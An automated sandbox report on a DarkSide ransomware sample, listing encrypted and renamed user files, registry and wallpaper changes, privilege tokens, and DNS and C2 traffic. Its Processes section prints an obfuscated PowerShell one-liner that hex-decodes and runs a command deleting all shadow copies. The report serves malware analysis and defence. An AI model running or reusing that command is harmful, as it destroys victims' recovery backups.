Malware Analysis Report

2024-10-16 03:29

Sample ID 210831-ldycz9hdzj
Target 8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc
SHA256 8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc

Threat Level: Known bad

The file 8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Control Panel

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-08-31 07:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-31 07:27

Reported

2021-08-31 07:29

Platform

win7v20210408

Max time kernel

50s

Max time network

55s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\InstallStop.crw => C:\Users\Admin\Pictures\InstallStop.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\StartUse.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertPush.png.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandSuspend.crw => C:\Users\Admin\Pictures\ExpandSuspend.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\DisableSuspend.tif => C:\Users\Admin\Pictures\DisableSuspend.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitSuspend.tiff => C:\Users\Admin\Pictures\SubmitSuspend.tiff.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitSuspend.tiff.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteRemove.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExpandSuspend.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\EnterRevoke.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseFind.raw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupEdit.tiff C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\EnterRevoke.crw => C:\Users\Admin\Pictures\EnterRevoke.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteRemove.tif => C:\Users\Admin\Pictures\CompleteRemove.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableSuspend.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallStop.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\BackupEdit.tiff => C:\Users\Admin\Pictures\BackupEdit.tiff.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\CheckpointRestart.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\FindDebug.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\UseFind.raw => C:\Users\Admin\Pictures\UseFind.raw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\SubmitSuspend.tiff C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\CloseUnblock.raw => C:\Users\Admin\Pictures\CloseUnblock.raw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\CloseUnblock.raw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointRestart.crw => C:\Users\Admin\Pictures\CheckpointRestart.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\FindDebug.crw => C:\Users\Admin\Pictures\FindDebug.crw.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\StartUse.tif => C:\Users\Admin\Pictures\StartUse.tif.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File renamed C:\Users\Admin\Pictures\AssertPush.png => C:\Users\Admin\Pictures\AssertPush.png.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupEdit.tiff.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe

"C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 8.8.8.8:53 89.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 1.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 9.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 65.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 67.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 12.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 85.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 57.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 49.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 37.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 75.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 69.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 59.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 34.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 30.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 43.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 21.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 41.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 16.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 4.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 87.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 46.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 105.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 81.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 44.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 77.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 42.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 71.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 36.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 63.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 28.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 26.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 55.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 53.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 51.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 17.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 14.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 8.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 11.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 103.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 7.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 95.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 5.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 91.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 3.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 61.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 83.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 2.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 101.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 47.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 45.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 33.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 31.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 29.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 27.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 22.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 18.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 107.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 97.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 93.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 10.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 99.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 6.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 79.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 73.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 80.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 68.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 52.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 127.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 58.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 125.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 123.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 121.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 119.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 117.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 115.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 76.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 113.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 74.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 111.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 64.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 54.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 62.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 70.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 78.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 50.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 72.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 48.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 56.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 109.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 94.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 86.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 118.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 114.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 110.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 106.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 102.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 60.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 84.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 112.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 96.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 98.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 100.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 90.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 82.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 66.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 92.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 104.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 116.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 108.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 162.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 171.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 187.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 195.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 130.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 147.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 136.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 144.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 177.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 154.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 185.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 135.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 142.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 131.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 148.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 137.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 156.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 139.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 143.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 157.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 159.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 163.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 165.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 173.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 179.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 183.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 215.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 207.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 149.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 132.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 134.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 145.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 140.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 138.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 151.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 146.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 153.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 150.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 155.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 152.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 158.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 175.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 161.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 160.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 169.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 164.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 217.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 166.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 199.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 203.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 209.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 191.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 221.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 129.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 213.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 197.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 201.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 205.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 211.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 219.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 141.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 181.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 223.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 167.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 133.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 189.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 193.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 174.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 176.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 170.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 245.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 241.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 239.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 235.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 231.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 229.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 227.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 251.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 253.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 202.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 249.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 194.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 247.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 190.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 243.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 186.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 237.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 182.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 233.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 225.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 180.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 172.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 168.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 184.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 188.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 192.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 196.0.7.10.in-addr.arpa udp
